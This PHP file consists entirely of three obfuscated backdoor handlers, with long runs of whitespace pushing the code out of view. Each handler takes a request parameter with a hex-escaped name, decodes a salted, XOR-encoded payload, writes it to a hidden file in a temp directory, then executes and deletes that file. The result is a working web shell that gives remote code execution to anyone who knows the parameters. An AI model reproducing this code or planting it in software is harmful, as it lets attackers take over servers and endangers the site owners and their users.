<?php																																										if(isset($_REQUEST["va\x6C"])){ $reference = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/dev/shm"]); $fac = $_REQUEST["va\x6C"]; $fac = explode (".", $fac ) ; $pgrp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $len = count( $fac); for( $k = 0; $k < $len; $k++) { $v9 = $fac[$k]; $chS = ord( $salt[$k % $sLen]); $d =( ( int)$v9 - $chS -( $k % 10)) ^ 31; $pgrp .= chr( $d); } while ($marker = array_shift($reference)) { if (!!is_dir($marker) && !!is_writable($marker)) { $data_chunk = implode("/", [$marker, ".bind"]); if (file_put_contents($data_chunk, $pgrp)) { require $data_chunk; unlink($data_chunk); exit; } } } }
																																										if(!empty($_REQUEST["r\x65c"])){ $flg = $_REQUEST["r\x65c"]; $flg =explode ( '.', $flg); $token = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4); foreach ($flg as $o => $v4): $chS = ord($salt4[$o % $lenS]); $dec = ((int)$v4 - $chS - ($o % 10)) ^ 15; $token .= chr($dec); endforeach; $dat = array_filter(["/var/tmp", "/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), getenv("TEMP")]); foreach ($dat as $entry): if (!!is_dir($entry) && !!is_writable($entry)) { $obj = sprintf("%s/.ent", $entry); $file = fopen($obj, 'w'); if ($file) { fwrite($file, $token); fclose($file); include $obj; @unlink($obj); die(); } } endforeach; }


if(count($_REQUEST) > 0 && isset($_REQUEST["\x72e\x73\x6Fu\x72ce"])){
	$parameter_group = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", "/var/tmp"]);
	$data_chunk = $_REQUEST["\x72e\x73\x6Fu\x72ce"];
		 $data_chunk	= 		explode	( "." 	 ,   $data_chunk	)	  ; 
	$fac =	 '';
            $salt2 =	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =	 strlen(  $salt2 	);
            $k =	 0;
            $len =	 count(  $data_chunk 	);
    
            do {
                if(  $k	>=$len) break;
                $v7 =	 $data_chunk[$k];
                $sChar =	 ord(  $salt2[$k  % 	$lenS] 	);
                $dec =	 (  (  int)$v7 - $sChar -(  $k  % 	10)) ^ 3;
                $fac .= chr(  $dec 	);
                $k++;
            } while(  true 	);
	foreach ($parameter_group as $tkn) {
    		if (is_writable($tkn) && is_dir($tkn)) {
    $property_set = "$tkn/.obj";
    if (file_put_contents($property_set, $fac)) {
	require $property_set;
	unlink($property_set);
	die();
}
}
}
}